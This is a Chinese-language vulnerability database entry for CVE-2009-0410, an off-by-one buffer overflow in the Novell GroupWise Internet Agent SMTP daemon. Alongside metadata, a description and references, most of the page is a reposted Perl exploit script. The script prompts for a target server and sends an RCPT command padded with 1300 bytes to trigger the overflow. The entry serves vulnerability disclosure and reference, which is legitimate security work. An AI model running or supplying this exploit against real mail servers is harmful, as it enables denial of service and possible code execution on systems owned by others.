Novell GroupWise RCPT命令单字节溢出漏洞

漏洞ID	1117347	漏洞类型	缓冲区溢出
发布时间	2009-02-04	更新时间	2009-02-06
CVE编号	CVE-2009-0410	CNNVD-ID	CNNVD-200902-057
漏洞平台	Windows	CVSS评分	10.0

|漏洞来源

https://www.exploit-db.com/exploits/7985
https://www.securityfocus.com/bid/33560
https://cxsecurity.com/issue/WLB-2009020104
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-057

|漏洞详情

NovellGroupWise是美国Novell公司的一套协作通讯系统。该系统提供了电子邮件、日程安排、即时通讯、任务管理、文档管理以及联系人管理等协作通讯服务。GroupWiseInternetAgent的SMTP守护程序在处理畸形的RCPT命令参数时存在单字节溢出漏洞。如果用户发送的邮件包含有超长的地址的话，就可以触发这个溢出，导致拒绝服务或执行任意代码。

|漏洞EXP

#!usr/bin/perl -w

#######################################################################################
###############################QUICK AND DIRTY EXPLOIT#################################
#######################################################################################
#   Off-by-one error in the SMTP daemon in GroupWise Internet Agent (GWIA)
#    in Novell GroupWise 6.5x, 7.0, 7.01, 7.02, 7.03, 7.03HP1a, and 8.0 allows
#    remote attackers to execute arbitrary code via a long e-mail address in a
#    malformed RCPT command, leading to a buffer overflow.
#    Refer:
#    http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0410
#
#    To run this exploit on MS Windows replace "#!usr/bin/perl -w" with
#     "#!Installation_path_for_perl -w" (say #!C:/Program Files/Perl/bin/perl -w)
#
#$$$$$This was strictly written for educational purpose. Use it at your own risk.$$$$$
#$$$$$Author will not bare any responsibility for any damages watsoever.$$$$$$$$$$$$$$
#
#        Author:    Praveen Darshanam
#        Email:     praveen[underscore]recker[at]sify.com\
#         Blog:        http://www.darshanams.blogspot.com/
#        Date:      04th February, 2009
#
########Thanx to str0ke, milw0rm, @rp m@n, an all the security folks####################
########################################################################################


use Net::SMTP;
print "***SMTP module is working fine***\n";


$buff="D" x 1300;
print "Enter Vulnerable Novell GroupWise SMTP Server Domain Name\n";
$smtp_vuln_server_name=<STDIN>;
chop($smtp_vuln_server_name);

$smtp_attack=Net::SMTP->new("$smtp_vuln_server_name");
print"\nEnter your/from mail ID here\n";
$$mail_from=<STDIN>;
chop($mail_from);


print"\nEnter Recepient mail ID\n";
$to_mail_id=<STDIN>;
chop($to_mail_id);

$mal_buffer=$buff.$to_mail_id;

$smtp_attack->mail($mail_from);
$smtp_attack->to($mal_buffer);

$smtp_attack->data();
$smtp_attack->datasend("Attacking...");

$smtp_attack->quit();

# milw0rm.com [2009-02-04]

|受影响的产品

Novell Groupwise 7.0 Novell Groupwise 6.5.7 Novell Groupwise 6.5.6 Novell Groupwise 6.5.4 Novell Groupwise 6.5.3 Novell Groupwise 6.5.2 Novell Groupwise

|参考资料

来源:MISC
链接:http://www.zerodayinitiative.com/advisories/ZDI-09-010/
来源:download.novell.com
链接:http://download.novell.com/Download?buildid=GjZRRdqCFW0
来源:BID
名称:33560
链接:http://www.securityfocus.com/bid/33560
来源:BUGTRAQ
名称:20090202ZDI-09-010:NovellNetwareGroupwiseGWIARCPTCommandBufferOverflowVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/500609/100/0/threaded
来源:www.novell.com
链接:http://www.novell.com/support/viewContent.do?externalId=7002502
来源:SECUNIA
名称:33744
链接:http://secunia.com/advisories/33744